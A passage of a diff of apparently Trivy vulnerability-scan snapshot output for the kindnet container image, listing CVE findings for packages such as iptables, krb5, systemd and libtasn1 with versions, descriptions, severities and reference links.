"https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip6tc2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", - }, - { - "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "4.13-3+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", + ], + }, + "category": "Vulnerability", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + 